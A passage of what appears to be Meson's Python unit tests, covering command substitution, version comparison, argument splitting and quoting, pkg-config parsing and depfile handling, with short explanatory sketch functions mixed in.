'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
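# Hedged sketch of the substitution rule the assertions above encode:
# list-valued keys (@INPUT@/@OUTPUT@ with several entries) may only appear
# as a whole argument, while string-valued keys substitute inside arguments.
def _toy_substitute(cmd, d):
    out = []
    for arg in cmd:
        value = d.get(arg)
        if isinstance(value, list):
            out.extend(value)  # whole-argument expansion only
            continue
        for key, val in d.items():
            if isinstance(val, str):
                arg = arg.replace(key, val)
        out.append(arg)
    return out
# Note: the real substitute_values() additionally allows embedding @INPUT@
# in a longer argument when there is exactly one input, and raises
# MesonException for unknown or out-of-range holes; this toy does neither.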
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
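# For reference, the cross file written above looks roughly like this
# (values are quoted because Meson parses them as Meson literals):
#
#   [binaries]
#   c = '/usr/bin/gcc'
#
#   [host_machine]
#   system = 'linux'
#   cpu_family = 'arm'
#   cpu = 'armv7'
#   endian = 'little'
#
#   [properties]
#   needs_exe_wrapper = true    # or false, negating the detected value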
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test that ObjectHolders pass through listify untouched
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# ObjectHolders in kwargs are left intact
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
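# Hedged sketch of the extract_as_list() behaviour exercised above: fetch
# one kwarg, flatten nested lists, and optionally pop the key.
def _toy_extract_as_list(kwargs, key, pop=False):
    value = kwargs.pop(key) if pop else kwargs.get(key, [])
    def flatten(v):
        for item in (v if isinstance(v, list) else [v]):
            if isinstance(item, list):
                yield from flatten(item)
            else:
                yield item
    return list(flatten(value))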
def test_pkgconfig_module(self):
class Mock:
pass
dummystate = Mock()
dummystate.subproject = 'dummy'
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
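# Hedged sketch of the rpmvercmp-style idea behind Version: split each
# string into digit and alpha runs, compare digit runs numerically (hence
# '10.0001' == '10.1') and alpha runs lexically; separators such as '.',
# '_' and '+' only delimit segments, which is why '2.0' == '2_0'.
def _toy_version_segments(s):
    return [int(tok) if tok.isdigit() else tok
            for tok in re.findall(r'\d+|[a-zA-Z]+', s)]
# _toy_version_segments('10.0001') == _toy_version_segments('10.1') == [10, 1]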
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
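# On POSIX the expected values above follow shlex semantics; a quick
# cross-check (an assumption based on the table, not on split_args itself):
def _demo_posix_split():
    import shlex
    assert shlex.split("'a b c' d e") == ['a b c', 'd', 'e']
    assert shlex.split(r'"a\\b\\c\\" d e') == ['a\\b\\c\\', 'd', 'e']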
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
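# Hedged sketch of the transitive walk the cycle cases above imply:
# follow rules target -> deps, collecting everything reachable while
# guarding against revisiting a node.
def _toy_all_deps(rules, target, seen=None):
    seen = set() if seen is None else seen
    deps = set()
    for dep in rules.get(target, []):
        if dep in seen:
            continue
        seen.add(dep)
        deps.add(dep)
        deps |= _toy_all_deps(rules, dep, seen)
    return deps
# _toy_all_deps({'a': ['b'], 'b': ['a']}, 'a') == {'a', 'b'}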
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
